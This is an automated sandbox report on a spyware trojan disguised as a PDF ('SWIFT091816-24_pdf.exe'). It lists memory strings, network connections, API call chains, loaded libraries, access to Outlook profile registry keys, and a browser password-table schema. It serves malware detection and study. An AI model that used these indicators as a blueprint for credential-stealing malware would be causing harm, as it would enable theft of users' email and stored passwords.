            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49852 version: TLS 1.2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: SWIFT091816-24_pdf.exe
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3600311B4_2_3600311B
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_360027B94_2_360027B9
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_360043284_2_36004328
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_36008E0C4_2_36008E0C
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_384133184_2_38413318
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_384103AF4_2_384103AF
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841CCA04_2_3841CCA0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841C6384_2_3841C638
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_384178484_2_38417848
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841F05A4_2_3841F05A
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841B07F4_2_3841B07F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841B9304_2_3841B930
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841C1F24_2_3841C1F2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841DA894_2_3841DA89
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841E3474_2_3841E347
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841EBF24_2_3841EBF2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841B4D84_2_3841B4D8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841CCA24_2_3841CCA2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841BDA24_2_3841BDA2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_384176284_2_38417628
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841DEE14_2_3841DEE1
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841E79F4_2_3841E79F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB29B84_2_38FB29B8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBA9B04_2_38FBA9B0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBA3604_2_38FBA360
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBBDF04_2_38FBBDF0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB9D104_2_38FB9D10
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB96C84_2_38FB96C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB86504_2_38FB8650
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB20F84_2_38FB20F8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB70704_2_38FB7070
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB70614_2_38FB7061
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB18584_2_38FB1858
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB184C4_2_38FB184C
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB00404_2_38FB0040
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB48204_2_38FB4820
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB51F84_2_38FB51F8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBA9A04_2_38FBA9A0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBF1364_2_38FBF136
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB21084_2_38FB2108
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB5AB84_2_38FB5AB8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB5AA84_2_38FB5AA8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBBA974_2_38FBBA97
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB32684_2_38FB3268
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB32584_2_38FB3258
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB52084_2_38FB5208
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB13F04_2_38FB13F0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB43C84_2_38FB43C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB63684_2_38FB6368
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB63584_2_38FB6358
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBA3524_2_38FBA352
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB7B4F4_2_38FB7B4F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB3B184_2_38FB3B18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB3B084_2_38FB3B08
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB74C84_2_38FB74C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB74B84_2_38FB74B8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB1CB04_2_38FB1CB0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB1CA04_2_38FB1CA0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB6C184_2_38FB6C18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB6C094_2_38FB6C09
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB14004_2_38FB1400
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBBDBC4_2_38FBBDBC
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB4DB24_2_38FB4DB2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB4DB04_2_38FB4DB0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB25604_2_38FB2560
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB255F4_2_38FB255F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB9D004_2_38FB9D00
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB36C24_2_38FB36C2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB36C04_2_38FB36C0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB96B84_2_38FB96B8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB56604_2_38FB5660
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB565F4_2_38FB565F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB56504_2_38FB5650
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB86404_2_38FB8640
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB2E104_2_38FB2E10
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB2E004_2_38FB2E00
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBAFF84_2_38FBAFF8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FBAFF64_2_38FBAFF6
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB67C04_2_38FB67C0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB67B04_2_38FB67B0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB0FA84_2_38FB0FA8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB0F984_2_38FB0F98
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB3F724_2_38FB3F72
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB3F704_2_38FB3F70
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_38FB5F104_2_38FB5F10
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_394EE7C84_2_394EE7C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_394ED6C14_2_394ED6C1
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_394E6FA04_2_394E6FA0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_394E83284_2_394E8328
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: String function: 00402BBF appears 49 times
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2960082582.0000000035EA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SWIFT091816-24_pdf.exe
            Source: SWIFT091816-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_00402095
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsf68FD.tmpJump to behavior
            Source: SWIFT091816-24_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000362E5000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000362F3000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000362D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SWIFT091816-24_pdf.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeFile read: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeProcess created: C:\Users\user\Desktop\SWIFT091816-24_pdf.exe "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SWIFT091816-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2465323286.0000000002B76000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2936005396.0000000001816000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
